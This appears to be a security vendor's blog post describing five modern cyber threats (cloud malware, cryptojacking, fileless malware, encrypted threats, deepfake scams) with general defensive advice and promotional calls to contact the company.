Nowadays, technology moves a mile a minute – or faster! Yet as the cyber security community are all too aware, for all of the exciting, positive advances being made, a negative, seedy undercurrent is never too far away.
Long gone are the days when a single strain of malware makes the news out of sheer novelty (WannaCry’s widespread utter devastation being the exception here). Cyber risks are now a ubiquitous, everyday threat to organisations of all kinds. “Traditional” viruses and social engineering attacks aren’t all we have to worry about nowadays.
So, with that in mind, let’s explore 5 types and/or methods of cyberattack that would have been unthinkable 10 years ago – and would have been considered frankly sci-fi at the turn of the 21st century.
Cloud Malware
In the internet’s infancy, infecting a single, well-placed PC could be enough for a hacker, depending on their aims, of course. Then, as network and internet connectivity became faster and more ubiquitous, criminals started leaning more on malware that swept across whole networks to cause widespread devastation.
But now the remote working – and indeed “work from anywhere” – movement is gaining momentum, an organisation’s endpoint devices may be spread across numerous different networks – and even across numerous continents! So, with this in mind, how can hackers carry out their evil ends when everyone’s so remote? By infecting their shared online resources, of course.
What is Cloud Malware?
Cloud malware is malicious software that’s designed to negatively impact and/or be distributed through cloud computing services. Cloud malware can facilitate data theft, data loss, disruption, credential bypassing/theft, eavesdropping attacks, and more.
Cloud platforms can be a potential goldmine for attackers as users generally have to trust their cloud software or storage vendors that everything is secure – the users themselves generally have little control over the actual servers and infrastructure that go into delivering that service.
Malware spread through cloud services is nothing new either. Cloud syncing and file sharing tools have been used by criminals since the mid-2010s to spread malware like Virlock. Organisations using cloud-based virtual machines can suffer Hypervisor attacks – attacks that either overload or take over the cloud Hypervisor software that controls their virtual machines.
How to Avoid Cloud Malware?
Anything that secures your cloud platforms and obfuscates the data held within gives you the best possible protection against cloud malware. If possible, encrypt all of your cloud storage data, regularly backup all data housed in the cloud, and require strong user authentication on all cloud logins.
Depending on your relationship with cloud providers, you may find it valuable to open up a dialogue with them about how they are protecting users’ cloud accounts and data.
It’s also wise to enact strict “principle of least privilege” policies and segment access to sensitive data across your cloud platforms to further reduce your potential cloud-based attack surface.
Cryptojacking Malware
Love it or hate it, cryptocurrency and blockchain technology has come a long way since Bitcoin’s inception in 2009. Some early adopters became millionaires overnight – but nowadays, by and large, returns are diminishing somewhat. However, that doesn’t stop cybercriminals from creating all manner of hacks, malware, and scams around crypto.
Though criminals often use unsuspecting victims’ curiosity and confusion around crypto to scam them out of their money, there is one cyber threat that is becoming a growing threat: cryptojacking.
What is Cryptojacking?
Cryptojacking is when hackers covertly harness the computing power of a victim’s device and use it to mine cryptocurrency for themselves – without the victim knowing. This is usually achieved through cryptojacking malware.
This is not a harmless or victimless crime. A cryptojacking victim’s device often ends up consuming more power than it did before, resulting in higher energy bills. Also, a cryptojacking victim’s computing resources are drawn away from the tasks that they need to carry out.
This is bad enough for private individuals who find themselves infected but it can be an incredibly costly problem for businesses with multiple devices under the cryptojackers’ spell. Energy consumption and computing power is being stolen from under their noses en masse, after all.
There are generally two ways that cryptojacking malware makes its way onto a victim’s device. The first is the same way that a lot of malware and persistent threats spread: through being embedded in a file, packaged in a piece of innocent-seeming software, or through clicking on an innocuous link.
The second is so-called “drive-by” cryptojacking. This is where cryptomining JavaScript code is installed on a web page, and that code runs on any device used to visit the page. This drive-by method can continue stealing computing power until long after the web page has been closed!
SonicWall’s 2023 Cyber Threat Report shows that cryptojacking attacks have risen by 43% since 2022.
How to Avoid Cryptojacking Malware?
The most effective way to stay safe from cryptojacking is to use reliable antivirus or endpoint protection software, and to keep it up to date. These solutions are generally wise to the tricks of cryptojackers and will help to prevent any malicious software or JavaScript from running.
A good firewall can also help to block known cryptojacking links from being accessed through simple DNS Sinkhole functionality. You can also install browser extensions/add-ons that prevent web-based cryptominers from running. It’s also good practice to invest in tools which monitor all of your devices’ power consumption, CPU usage, and even graphics card usage to help detect resource misuse.
Interpol has an excellent explainer about cryptojacking that is well worth a read.
Fileless Malware
Fileless malware is interesting in many ways. Its lineage traces back to viral DOS programs in the 80s and 90s but modern strains are now thought to account for around 40% of global malware infections .
What is Fileless Malware?
Fileless malware is a type of malicious software that operates entirely from the device’s operating memory (“RAM”). It doesn’t write any files or data to the device’s drive, which means it can more easily evade antimalware controls that rely on file scans and signatures.
Fileless infections usually operate by harnessing zero-day weaknesses within known, trusted software to covertly run nefarious code. Fileless malware can make its way on to a machine in much of the same ways as regular malware – by clicking a dodgy link or opening an infected file that loads the malicious code into the RAM.
Because it sits in the background, potentially undetectable to antivirus tools, fileless malware can be used to carry out
How to Avoid Fileless Malware?
Fileless malware is sneaky by design, so prevention is better than cure. Cyber awareness training can be particularly useful here, especially advice that stresses the importance of not clicking on suspicious links and not downloading files from untrusted sources.
However, training shouldn’t be your only defence. Endpoint detection and response tools like LimaCharlie provide rich endpoint usage logs that can help uncover unknown nasties. Managed detection and response tools like Huntress can connect you with a real, human threat hunter if any untoward activity is detected.
Encrypted Threats
Encryption is an important concept in cyber security. You can both encrypt data at rest and in transit to conceal its contents from prying eyes. And over the past 5 years or so, the internet has been moving towards encrypted HTTPS/TLS web traffic as standard – even for websites that don’t handle sensitive data like payment details.
All sounds good, right? Well, the benefits massively outweigh the drawbacks – but there are certainly drawbacks. Case in point: encrypted malware threats.
What are Encrypted Threats?
Encrypted threats are any kind of cyber threats that are purposefully distributed through encrypted connections like HTTPS/TLS in order to evade threat detection measures.
Though next-generation firewalls and security solutions can usually defend against encrypted cyber threats, older firewalls and security tools generally can’t. Why? Because older firewalls were developed before our encryption-first HTTPS-driven web, and are therefore more au fait with inspecting unencrypted HTTP traffic. Therefore, they are unlikely to have the facilities to decrypt and inspect any encrypted data that passes through and may simply let encrypted threats pass through unchallenged.
Newer, next-gen tools will generally include a function called “deep packet inspection” which allows the firewall to decrypt and inspect encrypted data packets before either sending that data on its way or stopping it in its tracks.
In their 2023 Cyber Threat Report, SonicWall found that though instances of encrypted threats are down on the whole, organisations in critical fields like education, healthcare, and government still seem to be a growing target.
How to Avoid Encrypted Threats?
The best way to prevent encrypted threats is to look into whether your existing firewall can handle deep packet inspection, and if not then it’s probably time to upgrade to one that does. There are alternative solutions that are designed just to intercept and decrypt data packets to check for encrypted nasties but a new firewall will provide you with a much wider range of up to date security benefits, far beyond mere defence from encrypted threats.
Our pals at Just Firewalls recommend that you upgrade your firewall every 5 years, so if your current firewall is any older, just get in touch for a no-obligation chat!
Deepfake Scams
This is arguably the cruellest and most insidious threat on this list. Despite the current wailing and gnashing of teeth over generative AI rendering all of our jobs obsolete, we feel that deepfake and voice cloning scams are perhaps the more present threat – because they’re already happening.
What is a Deepfake Scam?
A deepfake scam is where cybercriminals use AI deepfake technology to create a falsified, yet convincing video and/or audio clip of a real person in order to influence or defraud a victim.
The person being digitally impersonated could be anyone who will get the recipient to take notice: their manager, their CEO, a colleague, a celebrity, a friend, a family member. Depending on the technology used, a clip as short as 10-20 seconds of a person speaking can be used to create a convincing audio deepfake of them.
This isn’t science fiction, either. It’s old news. Back in 2019, criminals used AI software to impersonate a chief executive’s voice – down to his “slight German accent and the melody of his voice” – to deceive the CEO of a subsidiary over the phone, eventually defrauding the company out of €220,000. In a similar case from 2021, a bank manager was duped into transferring $35m to cybercriminals by using a fake, AI-generated voice of a person the victim knew well.
How to Avoid Deepfake Scams?
One of the best ways of scuppering any scams that purport to be from someone you know is to “trust but verify”. Before you act on a phone call or video message that instructs you to transfer any money or data outside of your organisation through non-standard means, double check those directions with the supposed sender through another channel.
Received a phone call from your boss asking you to make a large, unexpected bank transfer? Grab them on a video call or by email to confirm what you’ve been asked to do. Received a pre-recorded video message from a colleague who asks you to create a login or a physical access pass for someone you’ve never heard of? Give them a ring and double check.
Cyber threats don’t stay still – and cyber awareness training shouldn’t either! Ensure that any cyber training you run incorporates an awareness of deepfake scams and update that training alongside technological developments like these.
But that’s not all!
We’ve seen an influx of far more than just 5 types of threats over the last decade. We’ve discussed Internet of Things, SCADA, and ICS malware at length in other articles – all enabled by our increasingly connected world and the smart tech boom.
We’re also looking at the recent developments in quantum computing with some trepidation. Will it spell the end of secure data encryption as we know it?
We suppose the next decade will tell.
If you’re concerned that your existing cyber and network controls wouldn’t stand up to the threats discussed above, just ask the experts! Request a call back from a member of our senior technical team today.